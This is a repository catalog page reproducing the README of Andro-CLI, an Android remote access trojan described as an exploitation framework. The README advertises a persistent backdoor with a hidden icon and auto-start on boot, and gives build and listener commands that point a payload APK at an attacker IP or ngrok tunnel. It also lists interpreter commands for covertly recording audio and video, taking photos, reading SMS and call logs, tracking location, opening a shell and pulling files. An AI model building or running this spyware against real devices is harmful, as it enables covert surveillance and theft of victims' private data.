https://github.com/aryanvbw/andro-cli

Exploitation-Framework for Android devices - Framework that allows you to search for vulnerable android devices across the world and exploit them. A Simple android remote administration tool using sockets. It uses java on the client side and python on the server side

https://github.com/aryanvbw/andro-cli

Science Score: 26.0%

This score indicates how likely this project is to be science-related based on various indicators:

  • CITATION.cff file
  • codemeta.json file
    Found codemeta.json file
  • .zenodo.json file
    Found .zenodo.json file
  • DOI references
  • Academic publication links
  • Committers with academic emails
  • Institutional organization owner
  • JOSS paper metadata
  • Scientific vocabulary similarity
    Low similarity (14.6%) to scientific vocabulary

Keywords

android android-haking android-rat ardroidhaking aryanshop aryanvbw hacktoberfest haking kali l3mon lemon rat spyware termux-hacking termux-tool vivek vivek-w

Keywords from Contributors

hack bruteforce
Last synced: 5 months ago · JSON representation

Repository

Exploitation-Framework for Android devices - Framework that allows you to search for vulnerable android devices across the world and exploit them. A Simple android remote administration tool using sockets. It uses java on the client side and python on the server side

Basic Info
Statistics
  • Stars: 68
  • Watchers: 2
  • Forks: 9
  • Open Issues: 2
  • Releases: 2
Topics
android android-haking android-rat ardroidhaking aryanshop aryanvbw hacktoberfest haking kali l3mon lemon rat spyware termux-hacking termux-tool vivek vivek-w
Created almost 3 years ago · Last pushed 7 months ago
Metadata Files
Readme License

README.md


A python based remote android managment suite, powered by Python

Andro-CLI is a tool designed to give the control of the android system remotely and retrieve informations from it. Andro-CLI is a client/server application developed in Java Android for the client side and the Server is in Python.

Andro-vW will work on device from Android 4.1 (Jelly Bean) to Android 9.0 (Oreo) (API 16 to API 28)

Andro-CLI also works on Android 10 (Q) but some of the interpreter command will be unstable.

Screenshots

Andro-CLI

Features of Andro-CLI

  • Full persistent backdoor
  • Invisible icon on install
  • Light weight apk which runs 24*7 in background
  • App starts automatically on boot up
  • Can record audio, video, take picture from both camera
  • Browse call logs and SMS logs
  • Get current location, sim card details ,ip, mac address of the device

Prerequisites

Andro-CLI requires - Python3 - JAVA (or Android Studio) - zipalign

Installation

From PyPI (Recommended)

pip install androcli

From Source

wget https://github.com/AryanVBW/Andro-CLI/releases/download/ARDro2/androcli.zip && unzip androcli.zip cd androcli pip install -r requirements.txt

Using Virtual Environment (Recommended)

It's recommended to use a virtual environment to avoid conflicts with other Python packages:

```bash

Install virtualenv if not installed

pip install virtualenv

Create a virtual environment

python -m venv andro-env

Activate the virtual environment

On Windows

andro-env\Scripts\activate

On macOS/Linux

source andro-env/bin/activate

Install requirements

pip install -r requirements.txt

When finished, deactivate the environment

deactivate ```

Available Modes

  • --build - for building the android apk
  • --ngrok - for using ngrok tunnel (over the internet)
  • --shell - getting an interactive shell of the device

build mode

Usage: python3 androcli.py --build --ngrok [flags] Flags: -p, --port Attacker port number (optional by default its set to 8000) -o, --output Name for the apk file (optional by default its set to "test.apk") -icon, --icon Visible icon after installing apk (by default set to hidden)

Usage: python3 androcli.py --build [flags] Flags: -i, --ip Attacker IP address (required) -p, --port Attacker port number (required) -o, --output Name for the apk file (optional) -icon, --icon Visible icon after installing apk (by default set to hidden)

Or you can manually build the apk by importing Android Code folder to Android Studio and changing the IP address and port number in config.java file and then you can generate the signed apk from Android Studio -> Build -> Generate Signed APK(s)

shell mode

Usage: python3 androcli.py --shell [flags] Flags: -i, --ip Listner IP address -p, --port Listner port number After running the shell mode you will get an interpreter of the device

Commands which can run on the interpreter deviceInfo --> returns basic info of the device camList --> returns cameraID takepic [cameraID] --> Takes picture from camera startVideo [cameraID] --> starts recording the video stopVideo --> stop recording the video and return the video file startAudio --> starts recording the audio stopAudio --> stop recording the audio getSMS [inbox|sent] --> returns inbox sms or sent sms in a file getCallLogs --> returns call logs in a file shell --> starts a sh shell of the device vibrate [number_of_times] --> vibrate the device number of time getLocation --> return the current location of the device getIP --> returns the ip of the device getSimDetails --> returns the details of all sim of the device clear --> clears the screen getClipData --> return the current saved text from the clipboard getMACAddress --> returns the mac address of the device exit --> exit the interpreter In the sh shell there are some sub commands get [full_file_path] --> donwloads the file to the local machine (file size upto 15mb) put [filename] --> uploads the file to the android device

Examples

  • To build the apk using ngrok which will also set the listner: python3 androcli.py --build --ngrok -o try.apk

  • To build the apk using desired ip and port: python3 androcli.py --build -i 192.169.x.x -p 8000 -o try.apk

  • To get the interpreter: python3 androcli.py --shell -i 0.0.0.0 -p 8000

Interpreter Examples

  • Generating APK

  • Some interpreter Commands

Note:

Set up port forwarding easily using Pagekite / packetriot for smoother device connections!

While cloning the repository using Git bash on Windows, you may get the following error:

error: unable to create file <filename>: Filename too long

This is because the Git has a limit of 4096 characters for a filename, except on Windows when Git is compiled with msys. It uses an older version of the Windows API and there's a limit of 260 characters for a filename.

You can circumvent this by setting core.longpaths to true.

git config --system core.longpaths true

You must run Git bash with administrator privileges.

Usage (Windows and Linux)

  • To get the control panel of the app dial *#*#1337#*#* (For now it has only two options Restart Activity and Uninstall) > Note: In order to use this feature in some devices you need to enable the option display pop-up windows running in background from the settings.

TODO

  • set up protmap.io
  • Set up multi client
  • Add screenshot command
  • add Google firebase support

Special Thanks

Niraj Singh


Made with ❤️ By Aryan

v1.1.2

Disclaimer : This software is meant for educational purposes only. we are not responsible for any malicious use of the app.

Owner

  • Name: Vivek W
  • Login: AryanVBW
  • Kind: user
  • Location: india
  • Company: @TEch-Shop

🛰 𝐒𝐢𝐦𝐩𝐥𝐢𝐜𝐢𝐭𝐲 𝐒𝐩𝐚𝐫𝐤𝐬 𝐈𝐧𝐧𝐨𝐯𝐚𝐭𝐢𝐨𝐧🛡️ 🌟 Dive into the Future: ✨𒆜🆅🅸🆅🅴🅺 🆆𒆜 Studying in Newton school of Technology🚀

GitHub Events

Total
  • Watch event: 29
  • Push event: 20
  • Pull request event: 1
  • Fork event: 5
  • Create event: 1
Last Year
  • Watch event: 29
  • Push event: 20
  • Pull request event: 1
  • Fork event: 5
  • Create event: 1

Committers

Last synced: 8 months ago

All Time
  • Total Commits: 74
  • Total Committers: 2
  • Avg Commits per committer: 37.0
  • Development Distribution Score (DDS): 0.014
Past Year
  • Commits: 10
  • Committers: 2
  • Avg Commits per committer: 5.0
  • Development Distribution Score (DDS): 0.1
Top Committers
Name Email Commits
Vivek W 9****W 73
ImgBotApp I****p@g****m 1

Issues and Pull Requests

Last synced: 8 months ago

All Time
  • Total issues: 2
  • Total pull requests: 1
  • Average time to close issues: N/A
  • Average time to close pull requests: over 1 year
  • Total issue authors: 2
  • Total pull request authors: 1
  • Average comments per issue: 1.5
  • Average comments per pull request: 0.0
  • Merged pull requests: 1
  • Bot issues: 0
  • Bot pull requests: 1
Past Year
  • Issues: 0
  • Pull requests: 0
  • Average time to close issues: N/A
  • Average time to close pull requests: N/A
  • Issue authors: 0
  • Pull request authors: 0
  • Average comments per issue: 0
  • Average comments per pull request: 0
  • Merged pull requests: 0
  • Bot issues: 0
  • Bot pull requests: 0
Top Authors
Issue Authors
  • Dazmed707 (1)
  • ANDROID1010 (1)
Pull Request Authors
  • imgbot[bot] (2)
Top Labels
Issue Labels
Pull Request Labels